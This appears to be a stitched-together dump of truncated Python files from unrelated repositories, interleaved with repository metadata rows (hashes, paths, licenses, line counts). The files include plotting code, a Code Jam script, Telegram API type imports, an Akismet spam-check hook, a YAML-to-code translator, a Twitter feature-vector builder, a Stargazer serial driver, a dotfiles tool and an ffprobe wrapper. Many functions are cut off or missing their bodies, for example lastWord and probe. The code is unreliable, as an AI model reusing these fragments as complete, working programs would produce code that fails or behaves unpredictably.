ax1.set_ylabel("Probability density\n(blue=foreground, orange=null)")
ax1.set_xlabel("Total importance in window")
precisions = pos_ir.transform(orig_vals)
if (neg_ir is not None):
precisions = np.maximum(precisions, neg_ir.transform(orig_vals))
ax2 = ax1.twinx()
ax2.plot(orig_vals, precisions)
if (pos_threshold is not None):
ax2.plot([pos_threshold, pos_threshold], [0.0, 1.0], color="red")
if (neg_threshold is not None):
ax2.plot([neg_threshold, neg_threshold], [0.0, 1.0], color="red")
ax2.set_ylabel("Estimated foreground precision")
ax2.set_ylim(0.0, 1.02)
| 42.294176 | 80 | 0.618336 |
c04f8c1ca8657a2985f474bb739ac4de154e1a01 | 425 | py | Python | Google Jam/2016/lastword.py | djphan/Prog-Problems | db79d76f8a40e844c8cc61b3df2c0d52737ee9e4 | [
"MIT"
] | null | null | null | Google Jam/2016/lastword.py | djphan/Prog-Problems | db79d76f8a40e844c8cc61b3df2c0d52737ee9e4 | [
"MIT"
] | null | null | null | Google Jam/2016/lastword.py | djphan/Prog-Problems | db79d76f8a40e844c8cc61b3df2c0d52737ee9e4 | [
"MIT"
] | null | null | null | import sys
numTests = input()
for i in range (0, int(numTests)):
print ("Case #" + str(i+1) +": " + str(lastWord(input())))
| 25 | 100 | 0.647059 |
c04ff3ada5e9e3495ef3e426dee60d1388e47451 | 62,817 | py | Python | aiotdlib/api/types/update.py | pylakey/pytdlib | a390a298a24a7123f3f3aec9f995dee6d51a478e | [
"MIT"
] | 37 | 2021-05-04T10:41:41.000Z | 2022-03-30T13:48:05.000Z | aiotdlib/api/types/update.py | pylakey/pytdlib | a390a298a24a7123f3f3aec9f995dee6d51a478e | [
"MIT"
] | 13 | 2021-07-17T19:54:51.000Z | 2022-02-26T06:50:00.000Z | aiotdlib/api/types/update.py | pylakey/pytdlib | a390a298a24a7123f3f3aec9f995dee6d51a478e | [
"MIT"
] | 7 | 2021-09-22T21:27:11.000Z | 2022-02-20T02:33:19.000Z | # =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
import typing
from pydantic import Field
from .address import Address
from .authorization_state import AuthorizationState
from .background import Background
from .basic_group import BasicGroup
from .basic_group_full_info import BasicGroupFullInfo
from .call import Call
from .callback_query_payload import CallbackQueryPayload
from .chat import Chat
from .chat_action import ChatAction
from .chat_action_bar import ChatActionBar
from .chat_filter_info import ChatFilterInfo
from .chat_invite_link import ChatInviteLink
from .chat_join_request import ChatJoinRequest
from .chat_join_requests_info import ChatJoinRequestsInfo
from .chat_list import ChatList
from .chat_member import ChatMember
from .chat_nearby import ChatNearby
from .chat_notification_settings import ChatNotificationSettings
from .chat_permissions import ChatPermissions
from .chat_photo_info import ChatPhotoInfo
from .chat_position import ChatPosition
from .chat_theme import ChatTheme
from .chat_type import ChatType
from .connection_state import ConnectionState
from .draft_message import DraftMessage
from .file import File
from .group_call import GroupCall
from .group_call_participant import GroupCallParticipant
from .language_pack_string import LanguagePackString
from .location import Location
from .message import Message
from .message_content import MessageContent
from .message_interaction_info import MessageInteractionInfo
from .message_sender import MessageSender
from .notification import Notification
from .notification_group import NotificationGroup
from .notification_group_type import NotificationGroupType
from .notification_settings_scope import NotificationSettingsScope
from .option_value import OptionValue
from .order_info import OrderInfo
from .poll import Poll
from .reply_markup import ReplyMarkup
from .scope_notification_settings import ScopeNotificationSettings
from .secret_chat import SecretChat
from .sticker import Sticker
from .sticker_set import StickerSet
from .sticker_sets import StickerSets
from .suggested_action import SuggestedAction
from .supergroup import Supergroup
from .supergroup_full_info import SupergroupFullInfo
from .terms_of_service import TermsOfService
from .user import User
from .user_full_info import UserFullInfo
from .user_privacy_setting import UserPrivacySetting
from .user_privacy_setting_rules import UserPrivacySettingRules
from .user_status import UserStatus
from .video_chat import VideoChat
from ..base_object import BaseObject
| 29.203626 | 318 | 0.692711 |
c0507144735d0e0532afa021b9f51f1bb1e7c543 | 3,908 | py | Python | lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 34f8c7a826b6b89c3c9a649b5395798263b4077f | [
"MIT"
] | null | null | null | lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 34f8c7a826b6b89c3c9a649b5395798263b4077f | [
"MIT"
] | 3 | 2020-08-07T10:41:44.000Z | 2021-01-27T08:56:57.000Z | lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 34f8c7a826b6b89c3c9a649b5395798263b4077f | [
"MIT"
] | null | null | null | #
# Copyright (c) 2019 One Identity
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import pytest
from textwrap import dedent
from ..plugin import Plugin
from safeguard.sessions.plugin_impl.test_utils.plugin import assert_plugin_hook_result
| 36.185185 | 139 | 0.753327 |
c050754add3acb4ba8ba228383257d1e46d1352d | 2,997 | py | Python | forum_modules/akismet/startup.py | Stackato-Apps/osqa | 728bb43ae913e33769c52f40cadb26721faaf2b2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2017-07-14T09:58:07.000Z | 2017-07-14T09:58:07.000Z | forum_modules/akismet/startup.py | Stackato-Apps/osqa | 728bb43ae913e33769c52f40cadb26721faaf2b2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | forum_modules/akismet/startup.py | Stackato-Apps/osqa | 728bb43ae913e33769c52f40cadb26721faaf2b2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | import json
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from django.utils.encoding import smart_str
from django.shortcuts import render_to_response
from forum.modules import decorate
from forum import views
from lib.akismet import Akismet
from forum.settings import APP_URL, OSQA_VERSION
from settings import WORDPRESS_API_KEY, REP_FOR_NO_SPAM_CHECK
from forum.models.user import User
from forum.forms.general import SimpleCaptchaForm
import settings
# Wrap the question/answer/comment submission views so each post's text is
# run through the Akismet spam check before being accepted.  `check_spam`
# (presumably defined earlier in this module; not shown in this excerpt)
# takes the name of the form field holding the text and a human-readable
# label used in error messages.
decorate(views.writers.ask)(check_spam('text', _('question')))
decorate(views.writers.answer)(check_spam('text', _('answer')))
decorate(views.commands.comment)(check_spam('comment', _('comment')))
| 38.423077 | 129 | 0.610944 |
c051e45b01f5963f9aee4c9d0f6e2146b9de7aad | 7,077 | py | Python | prototype/python/element_translator.py | doanminhdang/YAML_MATH | 4a95ae26ccd36de9a2c148f4ac1246f3cf0372f8 | [
"MIT"
] | 1 | 2019-06-29T16:54:59.000Z | 2019-06-29T16:54:59.000Z | prototype/python/element_translator.py | doanminhdang/YAML_MATH | 4a95ae26ccd36de9a2c148f4ac1246f3cf0372f8 | [
"MIT"
] | null | null | null | prototype/python/element_translator.py | doanminhdang/YAML_MATH | 4a95ae26ccd36de9a2c148f4ac1246f3cf0372f8 | [
"MIT"
] | null | null | null | """
Translate an element, which is described by the YAML method file
and a descriptor file, into a target function.
Procedure:
1. When analyzing a YAML file, parse the call to the method-element, to get:
- list of inputs,
- list of outputs
2. Parse the YAML of that element, to know the name of the inputs and outputs,
create inputs and outputs with such names, value are translated-names (string,
given by the name-allocator before translating methods), they will be accessed
in the descriptor of that element.
3. Process the descriptor:
- If preprocess part is available: execute the preprocess part as Python 3 code.
- Treat the code part as text (a string), parse that text to detect:
anywhere there is the structure <var_name>, then replace it with the value
of that variable currently in Python memory (within scope of processing that
specific descriptor). The new text after processing the code part is named code.
- If postprocess part is available: execute the postprocess part as Python 3
code. By requirement, at the end of postprocess part, there will be a variables
named `code`. Write the value of `code` into the output string.
"""
import re
from . import descriptor_parser
from . import utils
from .shared_parameters import *
# def descriptor_file_parse(descriptor_file, method_file):
# descriptor = descriptor_file_read(descriptor_file)
# yaml_method = yaml_method_file_read(method_file)
# preprocess_parse(descriptor_file)
def yaml_single_method_file_read(yaml_method_file):
    """
    Read a method file which contains only one block
    """
    yaml_block = utils.yaml_file_read(yaml_method_file)
    # Analyze its commands
    # NOTE(review): `yaml_block` is parsed but never used, and the function
    # returns None — this looks like an unfinished stub.  Confirm whether it
    # should return `yaml_block` or whether the command analysis is TODO.
    return
def analyze_inputs(input_names, element_inputs):
    """Map template input descriptors to the decoded input names.

    Args:
        input_names: list of decoded (translated) input names, in call
            order.
        element_inputs: iterable of (ordered) dicts describing the
            element's template inputs.  Each entry has either a 'name' key
            (a single named input) or an 'array_name' key, which absorbs
            all remaining decoded names into a list.  If present, the
            'array_name' entry must be the last item.

    Returns:
        dict mapping each template input name to its decoded name (a
        string), or — for an 'array_name' entry — to the list of all
        decoded names not yet consumed.
    """
    real_inputs = {}
    next_name_idx = 0
    for item in element_inputs:
        if 'name' in item:
            # Single input: consume the next decoded name.
            real_inputs[item['name']] = input_names[next_name_idx]
            next_name_idx += 1
        elif 'array_name' in item:
            # Array input: absorb every decoded name not yet consumed.
            real_inputs[item['array_name']] = input_names[next_name_idx:]
    return real_inputs
def parse_code(code_string):
    """Split a code template into literal-text and variable segments.

    Variables are written as ``<var_name>`` where the name consists of word
    characters plus ``[`` and ``]`` (so indexed names like ``<input_[0]>``
    are recognized).

    Args:
        code_string: the (possibly multi-line) template text.

    Returns:
        list of one-key dicts in order of appearance: ``{'text': ...}`` for
        literal spans and ``{'var': ...}`` for variable names (without the
        angle brackets).  Empty literal spans are omitted.

    Fixes over the previous implementation: literal text after the final
    variable (and templates containing no variables at all) used to be
    silently dropped, truncating the generated code; it is now preserved.
    The regex is also matched once per segment instead of three times.
    """
    segments = []
    var_pattern = re.compile(r'\<[\w\[\]]+\>')
    pos = 0
    for match in var_pattern.finditer(code_string):
        if match.start() > pos:
            segments.append({'text': code_string[pos:match.start()]})
        segments.append({'var': match.group().strip('<>')})
        pos = match.end()
    if pos < len(code_string):
        # Keep whatever literal text follows the last variable.
        segments.append({'text': code_string[pos:]})
    return segments
def translate_single_code(input_dict, output_dict, preprocess_string,
                          code_string, postprocess_string):
    """Render one element's code template into target code.

    Binds the decoded input/output names as local variables (via exec),
    runs the descriptor's preprocess code, substitutes ``<var>`` markers in
    the template in two rounds, then runs the postprocess code and returns
    the final code string.

    Example shapes:
    input_dict == {'input_': ['A_1', 'A_2', 'A_3']}
    output_dict == {'output': 'Alpha'}
    parsed_code == [{'var': 'output'}, {'text': ' := '}, {'var': 'command_text'}]

    NOTE(review): this relies on CPython frame behavior — names assigned by
    exec() inside a function land in the frame's locals mapping, where the
    later eval() calls can find them.  This is implementation-specific and
    fragile; confirm before porting to another interpreter.
    """
    _code_series = parse_code(code_string)
    print('preprocess:')
    print(preprocess_string)
    print('code:')
    print(code_string)
    print('postprocess:')
    print(postprocess_string)
    # Bind each decoded input name as a local variable holding its
    # translated-name string (or a list of strings for array inputs).
    for _key in input_dict:
        if isinstance(input_dict[_key], list):
            # it is an array
            _assign_code = _key + '=' + '['
            for _item in input_dict[_key]:
                _assign_code += '\'' + _item + '\','
            _assign_code = _assign_code[:-1]+']' # remove the last comma
        else:
            _assign_code = _key + '=' + '\'' + input_dict[_key] + '\''
        exec(_assign_code)
    # Bind the decoded output names the same way.
    for _key in output_dict:
        _assign_code = _key + '=' + '\'' + output_dict[_key] + '\''
        exec(_assign_code)
    # Descriptor-supplied preprocess code may define further variables
    # referenced by the template (e.g. command_text).
    exec(preprocess_string)
    # 1st round: substitute variable names in code string
    _1st_processed_code = ''
    for _chunk in _code_series:
        if 'text' in _chunk:
            _1st_processed_code += _chunk['text']
        if 'var' in _chunk:
            _1st_processed_code += eval(_chunk['var'])
    #2nd round: replace variable names left, which might come from preprocess,
    # like: input_[0]
    _parsed_2nd_code = parse_code(_1st_processed_code)
    code = ''
    for _chunk in _parsed_2nd_code:
        if 'text' in _chunk:
            code += _chunk['text']
        if 'var' in _chunk:
            code += eval(_chunk['var'])
    # Preset output code, in case postprocess part is empty
    exec(output_code_descriptor + ' = code')
    # BUG: if output_code_descriptor is 'code', there is a Python bug that
    # variable code is not updated after the next exec
    # Postprocess may rewrite the variable named by output_code_descriptor.
    exec(postprocess_string)
    final_processed_code = eval(output_code_descriptor)
    return final_processed_code
| 39.758427 | 94 | 0.687014 |
c0549485e176a6b48bb54cda44e0d335364d8ccb | 16,351 | py | Python | build_feature_vectors_32.py | weberdc/find_hccs | 43fcb151901f48765ea8e4ccf0b82dbb726762a3 | [
"Apache-2.0"
] | 7 | 2020-10-23T20:41:30.000Z | 2021-11-20T14:00:25.000Z | build_feature_vectors_32.py | weberdc/find_hccs | 43fcb151901f48765ea8e4ccf0b82dbb726762a3 | [
"Apache-2.0"
] | 5 | 2020-11-25T00:29:43.000Z | 2021-11-01T02:15:29.000Z | build_feature_vectors_32.py | weberdc/find_hccs | 43fcb151901f48765ea8e4ccf0b82dbb726762a3 | [
"Apache-2.0"
] | 2 | 2021-05-31T06:51:08.000Z | 2022-02-09T13:55:18.000Z | #!/usr/bin/env python3
import csv
import gzip
import json
import networkx as nx
import sys
import time
import utils
from argparse import ArgumentParser
from calculate_activity_network import embedded_extended_tweet_url, root_of_conversation
from collections import defaultdict
from datetime import datetime
from utils import eprint, expanded_urls_from, extract_text, flatten, lowered_hashtags_from, mentioned_ids_from#, timestamp_2_epoch_seconds
# Builds feature vectors for HCC members and their groupings as input to the
# classifiers for validation
#
# This version extracts 32 features
#
# Renamed from extract_feature_vectors_for_hcc_classifier.py
TWITTER_TS_FORMAT = '%a %b %d %H:%M:%S +0000 %Y' # Tue Apr 26 08:57:55 +0000 2011
def root_of_conversation(tweet_in_conversation, tweet_map):
    """Walk the reply chain upwards and return the root tweet's id.

    Stops when the current tweet is not present in `tweet_map` (i.e. its
    parent lies outside the corpus) or is not itself a reply.
    NOTE(review): this redefinition shadows the same-named function imported
    at the top of the file — confirm that is intentional.
    """
    current_id = tweet_in_conversation
    while True:
        tweet = tweet_map.get(current_id)
        parent_id = tweet.get('in_reply_to_status_id_str') if tweet else None
        if not parent_id:
            return current_id
        current_id = parent_id
# Per-user features extracted from each account's tweets (U_ prefix).
USER_FEATURES = [
    'U_tweet_count',
    'U_retweet_count',
    'U_reply_count',
    'U_tweet_rate',
    'U_mentioned_ids', # unique IDs
    'U_mention_count', # every mention
    'U_unique_hts',    # unique hashtags
    'U_ht_count',      # every hashtag
    'U_unique_urls',   # unique URLs
    'U_url_count',     # every URL
    'U_default_img',
    'U_desc_len',
    'U_url'
]
# Twitter's stock avatar; used to detect profiles with no custom image.
DEFAULT_PROF_IMG_URL = 'http://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png'
# Per-community features computed from each community's activity graph
# (C_ prefix).
COMMUNITY_FEATURES = [
    'C_tweet_count',
    'C_node_count',
    'C_edge_count',
    'C_user_count',
    'C_author_count',
    'C_hashtag_count',
    'C_url_count',
    'C_repost_count',
    'C_quote_count',
    'C_mention_count',
    'C_reply_count',
    'C_use_ht_count',
    'C_use_url_count',
    'C_in_conv_count',
    'C_in/ext_repost',
    'C_in/ext_mention',
    'C_in/ext_reply',
]
# Verbose-output flag; overwritten from the command line in __main__.
DEBUG = False
if __name__ == '__main__':
    # `Options` is presumably defined elsewhere in this file (not shown in
    # this excerpt); it parses --ids-file/--tweets-file/--label/--verbose.
    options = Options()
    opts = options.parse(sys.argv[1:])
    DEBUG=opts.verbose
    # Phase 1: load HCC membership CSV — one row per (node_id, community_id).
    users = {}
    communities = defaultdict(lambda: [], {})
    with open(opts.ids_file, 'r', encoding='utf-8') as f:
        csv_reader = csv.DictReader(f, delimiter=',', quotechar='"')
        for row in csv_reader:
            r = {}
            for key in row: # range(len(row)):
                r[key] = row[key]
            users[r['node_id']] = r
            communities[r['community_id']].append(r['node_id'])
            # users[r[0]] = r
    # Phase 2: read the tweet corpus (gzipped if the filename ends in z/Z),
    # keeping only tweets authored by known users, and track the overall
    # collection window.
    tweets = dict([(uid, []) for uid in users.keys()])
    earliest_ts = sys.maxsize
    latest_ts = 0
    # with open(opts.tweets_file, 'r', encoding='utf-8') as f:
    f = gzip.open(opts.tweets_file, 'rt') if opts.tweets_file[-1] in 'zZ' else open(opts.tweets_file, 'r', encoding='utf-8')
    for l in f:
        tweet = json.loads(l.strip())
        tweet['ts'] = utils.extract_ts_s(tweet['created_at']) # timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
        if tweet['ts'] < earliest_ts: earliest_ts = tweet['ts']
        if tweet['ts'] > latest_ts: latest_ts = tweet['ts']
        user_id = tweet['user']['id_str']
        if user_id in users.keys():
            # tweet['ts'] = timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
            tweets[user_id].append(tweet)
    f.close()
    collection_period_mins = (latest_ts - earliest_ts) / 60
    # Phase 3: per-user feature vectors (build_user_feature_vector is
    # presumably defined elsewhere in this file).
    user_feature_vectors = {}
    for user_id in tweets:
        tweets[user_id].sort(key=lambda t: t['ts'])
        user_feature_vectors[user_id] = build_user_feature_vector(user_id, tweets[user_id], collection_period_mins)
    # Phase 4: per-community feature vectors, computed from each
    # community's activity graph (helpers presumably defined elsewhere).
    community_feature_vectors = {}
    for community_id in communities:
        # De-duplicate by tweet id across the community's members.
        community_tweets = {}
        community = communities[community_id]
        for user_id in community:
            for t in tweets[user_id]:
                community_tweets[t['id_str']] = t
            # community_tweets += tweets[user_id]
        # community_tweets.sort(key=lambda t: t['ts'])
        # build activity graph from tweets
        g = build_activity_graph(community_tweets, earliest_ts)
        # build feature vector from activity graph
        community_feature_vectors[community_id] = build_community_feature_vector(community, g)
    # Phase 5: emit one CSV row per user, joining user- and community-level
    # features, to stdout.
    header = ','.join(map(str, ['Label'] + USER_FEATURES + ['U_prop_hcc_degree', 'community_id'] + COMMUNITY_FEATURES))
    print(header)
    for user_id in tweets:
        user_vector = user_feature_vectors[user_id]
        hcc_prop_degree = users[user_id]['proportional_degree']
        community_id = users[user_id]['community_id']
        community_vector = community_feature_vectors[community_id]
        print(','.join([
            opts.label,
            mk_feature_str(USER_FEATURES, user_vector),
            hcc_prop_degree,
            community_id,
            mk_feature_str(COMMUNITY_FEATURES, community_vector)
        ]))
        # print('%s: %s %s' % (user_id, str(user_feature_vectors[user_id]), str()))
c0556573b1b396000e337b73f3de0c54b4d2d005 | 374 | py | Python | src/viewer/abs/forms.py | ozacas/asxtrade | a3645ae526bfc7a546fdf2a39520feda99e3390a | [
"Apache-2.0"
] | 8 | 2021-03-20T13:12:25.000Z | 2022-02-07T11:17:40.000Z | src/viewer/abs/forms.py | ozacas/asxtrade | a3645ae526bfc7a546fdf2a39520feda99e3390a | [
"Apache-2.0"
] | 8 | 2021-03-07T03:23:46.000Z | 2021-06-01T10:49:56.000Z | src/viewer/abs/forms.py | ozacas/asxtrade | a3645ae526bfc7a546fdf2a39520feda99e3390a | [
"Apache-2.0"
] | 3 | 2020-12-08T10:22:23.000Z | 2021-08-04T01:59:24.000Z | from django import forms
from django.core.exceptions import ValidationError
from abs.models import dataflows
| 31.166667 | 83 | 0.71123 |
c058a47a9fcf9cced343a8955317d5594bcf17a7 | 734 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 1 | 2022-01-16T10:00:24.000Z | 2022-01-16T10:00:24.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | # Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
# Logger
log = logging.getLogger(__name__)
def clear_access_session_intf(device, intf):
    """ Clear dot1x access sessions on a single interface
        Args:
            device ('obj'): Device object
            intf ('str'): Interface whose access sessions will be cleared
        Returns:
            None
        Raises:
            SubCommandFailure
    """
    command = 'clear access-session interface {intf}'.format(intf=intf)
    try:
        device.execute(command)
    except SubCommandFailure as e:
        # Re-raise with device context so the caller sees which box failed.
        raise SubCommandFailure(
            "Could not clear access-session interface on {device}. Error:\n{error}"
            .format(device=device, error=e)
        )
c059b518fc62b90809941f99c3bd5f94aa341ed5 | 9,713 | py | Python | pipeline/forms.py | jnis77diver/django-pipeline | 8bac57adae84615d9d79ad19b2b591c2e46879f9 | [
"MIT"
] | null | null | null | pipeline/forms.py | jnis77diver/django-pipeline | 8bac57adae84615d9d79ad19b2b591c2e46879f9 | [
"MIT"
] | 1 | 2021-09-20T22:02:21.000Z | 2021-09-21T13:55:41.000Z | pipeline/forms.py | jnis77diver/django-pipeline | 8bac57adae84615d9d79ad19b2b591c2e46879f9 | [
"MIT"
] | 1 | 2021-09-18T01:39:48.000Z | 2021-09-18T01:39:48.000Z | """Support for referencing Pipeline packages in forms and widgets."""
from __future__ import unicode_literals
from django.contrib.staticfiles.storage import staticfiles_storage
from django.utils.functional import cached_property
try:
from django.utils.six import iteritems, add_metaclass
except ImportError:
from .decorator import add_metaclass
from .collector import default_collector
from .conf import settings
from .packager import Packager
| 34.81362 | 79 | 0.615258 |
c05cbafe5128e838bdc6f0435f143a4bec7be43b | 1,838 | py | Python | api_user/views.py | archkwon/python-django-restful-mysql | a8097c08057de9656cb40266420fcffebb11bdb6 | [
"MIT"
] | null | null | null | api_user/views.py | archkwon/python-django-restful-mysql | a8097c08057de9656cb40266420fcffebb11bdb6 | [
"MIT"
] | null | null | null | api_user/views.py | archkwon/python-django-restful-mysql | a8097c08057de9656cb40266420fcffebb11bdb6 | [
"MIT"
] | null | null | null | from django.http import QueryDict
from django.http.response import JsonResponse
from rest_framework import viewsets, status
from rest_framework.views import APIView
from .serializers import *
# | 31.152542 | 72 | 0.650707 |
c05d4625afeae008646d224702597baba51c509c | 5,043 | py | Python | vms/create_kit_files.py | vmssoftware/python_3_8_2 | 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81 | [
"CNRI-Python-GPL-Compatible"
] | 3 | 2020-11-30T22:36:38.000Z | 2021-01-22T01:00:06.000Z | vms/create_kit_files.py | vmssoftware/python_3_8_2 | 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | vms/create_kit_files.py | vmssoftware/python_3_8_2 | 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81 | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2021-04-13T13:17:02.000Z | 2021-04-13T13:17:02.000Z | import os
import re
import sys
if __name__ == "__main__":
    import getopt
    import datetime

    # Kit version fields with their defaults; each may be overridden by the
    # matching long option (--type, --major, ...).
    values = {
        'type': 'F',
        'major': '3',
        'minor': '8',
        'level': '2',
        'edit': '',  # e.g. 'd' + datetime.date.today().strftime('%Y%m%d')
    }
    long_options = ['%s=' % name for name in values]
    opts, args = getopt.getopt(sys.argv[1:], '', long_options)
    for opt, optarg in opts:
        name = opt.lstrip('-')
        if name in values:
            values[name] = optarg
        else:
            print('Unknown option %s' % opt)
    create_content(
        values['type'],
        values['major'],
        values['minor'],
        values['level'],
        values['edit'],
    )
| 26.265625 | 120 | 0.601229 |
c05de0c488b3f0907732a9cffd73ea481b5c0be6 | 10,458 | py | Python | dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 0984ade31ecfcd003e1cce4f165fcd717e9b6317 | [
"WTFPL"
] | 4 | 2016-06-19T20:02:12.000Z | 2017-02-27T19:55:49.000Z | dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 0984ade31ecfcd003e1cce4f165fcd717e9b6317 | [
"WTFPL"
] | 6 | 2016-01-20T20:24:42.000Z | 2016-08-17T02:31:43.000Z | dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 0984ade31ecfcd003e1cce4f165fcd717e9b6317 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python
# .py
# @TODO:
# - fix the diffing
# - use rsync across hosts or something fancy
import argparse, difflib, functools, re, shutil, subprocess, sys, time, os
from pprint import pprint
__description__ = "Manage your dotfiles."
def ls(path):
    """Return the entry names inside *path* (like ``os.listdir``)."""
    return os.listdir(path)


def ls_abs(path):
    """Return the entries of *path* with *path* joined onto each name."""
    return [os.path.join(path, x) for x in os.listdir(path)]


def ln(src, dst):
    """Create a symbolic link at *dst* pointing to *src*."""
    os.symlink(src, dst)


def unlink(src):
    """Remove the file or symlink at *src*."""
    os.unlink(src)
#
# dotfiles command API
#
#
# main
#
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    status = main()
    sys.exit(status)
| 34.288525 | 104 | 0.52467 |
c05e6da89d714cfca87531c2eed521c2ad804f17 | 246 | py | Python | plot_log_population.py | catskillsresearch/openasr20 | b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e | [
"Apache-2.0"
] | null | null | null | plot_log_population.py | catskillsresearch/openasr20 | b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e | [
"Apache-2.0"
] | null | null | null | plot_log_population.py | catskillsresearch/openasr20 | b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e | [
"Apache-2.0"
] | 1 | 2021-07-28T02:13:21.000Z | 2021-07-28T02:13:21.000Z | import matplotlib.pylab as plt
| 24.6 | 69 | 0.707317 |
c05e9891a35e2b972d23578bd72644f77e52bb11 | 12,711 | py | Python | src/stargazer/stargazer.py | magazino/stargazer | d350959b830b084d31656682721f68b22683ceba | [
"MIT"
] | 1 | 2020-02-16T13:18:39.000Z | 2020-02-16T13:18:39.000Z | src/stargazer/stargazer.py | magazino/stargazer | d350959b830b084d31656682721f68b22683ceba | [
"MIT"
] | 3 | 2017-11-10T14:06:05.000Z | 2020-04-10T08:27:00.000Z | src/stargazer/stargazer.py | magazino/stargazer | d350959b830b084d31656682721f68b22683ceba | [
"MIT"
] | null | null | null | """
Driver class for Hagisonic Stargazer, with no ROS dependencies.
"""
from serial import Serial
from collections import deque
import re
import yaml
import time
import logging
import rospy
import numpy as np
from threading import Thread, Event
from tf import transformations
# Framing characters of the Stargazer serial protocol.
# STX: char that represents the start of a properly formed message
STX = '~'
# ETX: char that represents the end of a properly formed message
ETX = '`'
# DELIM: char that splits data
DELIM = '|'
# CMD: char that indicates command
CMD = '#'
# RESPONSE: char that indicates a response to a command
RESPONSE = '!'
# RESULT: char that indicates that the message contains result data
RESULT = '^'
# NOTIFY: char that indicates a notification message of some kind
NOTIFY = '*'
def local_to_global(marker_map, local_poses):
    """
    Transform local marker coordinates to map coordinates.

    Args:
        marker_map: dict of marker id -> marker-to-map transform matrix
            (homogeneous 4x4, as produced by fourdof_to_matrix).
        local_poses: dict of marker id -> pose matrix in the local frame.

    Returns:
        (global_poses, unknown_ids): dict of id -> local-to-map transform for
        every id found in marker_map, plus the set of ids that were not.
    """
    global_poses = dict()
    unknown_ids = set()
    # .items() instead of the Python-2-only .iteritems(): identical behaviour
    # on Python 2, and it no longer crashes on Python 3.
    for _id, pose in local_poses.items():
        if _id in marker_map:
            marker_to_map = marker_map[_id]
            # Invert the observed pose, then chain it with the marker's
            # map transform to obtain the local-to-map transform.
            local_to_marker = np.linalg.inv(pose)
            local_to_map = np.dot(marker_to_map, local_to_marker)
            global_poses[_id] = local_to_map
        else:
            unknown_ids.add(_id)
    return global_poses, unknown_ids
def fourdof_to_matrix(translation, yaw):
    """
    Build a homogeneous transform from a Cartesian translation plus a yaw
    angle (rotation about the z axis).
    """
    transform = transformations.rotation_matrix(yaw, [0, 0, 1])
    transform[0:3, 3] = translation
    return transform
c06110be42afdd7912f3230ce0bb253e62f06b14 | 107 | py | Python | example.py | karishmashuklaa/flatifyLists | af9c1cfc45c29756ff9e285dba65f3b4909dabab | [
"MIT"
] | null | null | null | example.py | karishmashuklaa/flatifyLists | af9c1cfc45c29756ff9e285dba65f3b4909dabab | [
"MIT"
] | null | null | null | example.py | karishmashuklaa/flatifyLists | af9c1cfc45c29756ff9e285dba65f3b4909dabab | [
"MIT"
] | null | null | null | from flatifylists import flatifyList
example = [[[1,2], [3,[4,[5],6],7],8,9]]
print(flatifyList(example)) | 21.4 | 40 | 0.672897 |
c0619baa743809ca6b4e84726f67140652acbe34 | 834 | py | Python | pympeg/_probe.py | AP-Atul/pympeg | 26d18883d528ce73c09982f61440d170661165ae | [
"Unlicense"
] | 5 | 2021-01-18T03:19:32.000Z | 2021-04-27T06:58:41.000Z | pympeg/_probe.py | AP-Atul/pympeg | 26d18883d528ce73c09982f61440d170661165ae | [
"Unlicense"
] | null | null | null | pympeg/_probe.py | AP-Atul/pympeg | 26d18883d528ce73c09982f61440d170661165ae | [
"Unlicense"
] | null | null | null | import os
import json
import subprocess
from ._exceptions import ProbeException
__all__ = ['probe']
def probe(filename, cmd='ffprobe', timeout=None):
